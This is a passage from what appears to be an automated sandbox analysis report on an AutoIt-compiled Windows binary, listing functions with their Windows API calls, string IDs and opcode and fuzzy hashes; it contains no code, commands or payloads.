                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                            Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-3360698832
                            • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                            • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                            Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                            • SetCursor.USER32(00000000), ref: 0043075B
                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                            • SetCursor.USER32(00000000), ref: 00430773
                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                            • SetCursor.USER32(00000000), ref: 0043078B
                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                            • SetCursor.USER32(00000000), ref: 004307A3
                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                            • SetCursor.USER32(00000000), ref: 004307BB
                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                            • SetCursor.USER32(00000000), ref: 004307D3
                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                            • SetCursor.USER32(00000000), ref: 004307EB
                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                            • SetCursor.USER32(00000000), ref: 00430803
                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                            • SetCursor.USER32(00000000), ref: 0043081B
                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                            • SetCursor.USER32(00000000), ref: 00430833
                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                            • SetCursor.USER32(00000000), ref: 0043084B
                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                            • SetCursor.USER32(00000000), ref: 00430863
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                            • SetCursor.USER32(00000000), ref: 0043087B
                            • SetCursor.USER32(00000000), ref: 00430887
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                            • SetCursor.USER32(00000000), ref: 0043089F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Cursor$Load
                            • String ID:
                            • API String ID: 1675784387-0
                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                            Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(0000000E), ref: 00430913
                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                            • GetSysColor.USER32(00000012), ref: 00430933
                            • SetTextColor.GDI32(?,?), ref: 0043093B
                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                            • GetSysColor.USER32(0000000F), ref: 00430959
                            • CreateSolidBrush.GDI32(?), ref: 00430962
                            • GetSysColor.USER32(00000011), ref: 00430979
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                            • SetBkColor.GDI32(?,?), ref: 004309A6
                            • SelectObject.GDI32(?,?), ref: 004309B4
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                            • GetSysColor.USER32(00000011), ref: 00430A9F
                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                            • SelectObject.GDI32(?,?), ref: 00430AD0
                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                            • SelectObject.GDI32(?,?), ref: 00430AE3
                            • DeleteObject.GDI32(?), ref: 00430AE9
                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1582027408-0
                            • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                            • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                            Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseConnectCreateRegistry
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 3217815495-966354055
                            • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                            • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                            Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 004566AE
                            • GetDesktopWindow.USER32 ref: 004566C3
                            • GetWindowRect.USER32(00000000), ref: 004566CA
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                            • DestroyWindow.USER32(?), ref: 00456746
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                            • IsWindowVisible.USER32(?), ref: 0045682C
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                            • GetWindowRect.USER32(?,?), ref: 00456873
                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                            • CopyRect.USER32(?,?), ref: 004568BE
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                            • String ID: ($,$tooltips_class32
                            • API String ID: 225202481-3320066284
                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                            Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                            Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                            • GetClientRect.USER32(?,?), ref: 00471D05
                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                            • GetClientRect.USER32(?,?), ref: 00471E8A
                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                            • String ID: @$AutoIt v3 GUI
                            • API String ID: 867697134-3359773793
                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                            Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$__wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                            • API String ID: 790654849-32604322
                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                            Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                            • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                            Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                            • _fseek.LIBCMT ref: 00452B3B
                            • __wsplitpath.LIBCMT ref: 00452B9B
                            • _wcscpy.LIBCMT ref: 00452BB0
                            • _wcscat.LIBCMT ref: 00452BC5
                            • __wsplitpath.LIBCMT ref: 00452BEF
                            • _wcscat.LIBCMT ref: 00452C07
                            • _wcscat.LIBCMT ref: 00452C1C
                            • __fread_nolock.LIBCMT ref: 00452C53
                            • __fread_nolock.LIBCMT ref: 00452C64
                            • __fread_nolock.LIBCMT ref: 00452C83
                            • __fread_nolock.LIBCMT ref: 00452C94
                            • __fread_nolock.LIBCMT ref: 00452CB5
                            • __fread_nolock.LIBCMT ref: 00452CC6
                            • __fread_nolock.LIBCMT ref: 00452CD7
                            • __fread_nolock.LIBCMT ref: 00452CE8
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452D78
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                            • String ID:
                            • API String ID: 2054058615-0
                            • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                            • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                            Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window
                            • String ID: 0
                            • API String ID: 2353593579-4108050209
                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                            Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                            • GetWindowDC.USER32(?), ref: 0044A0F6
                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                            • GetSysColor.USER32(0000000F), ref: 0044A131
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                            • GetSysColor.USER32(00000005), ref: 0044A15B
                            • GetWindowDC.USER32(?), ref: 0044A1BE
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
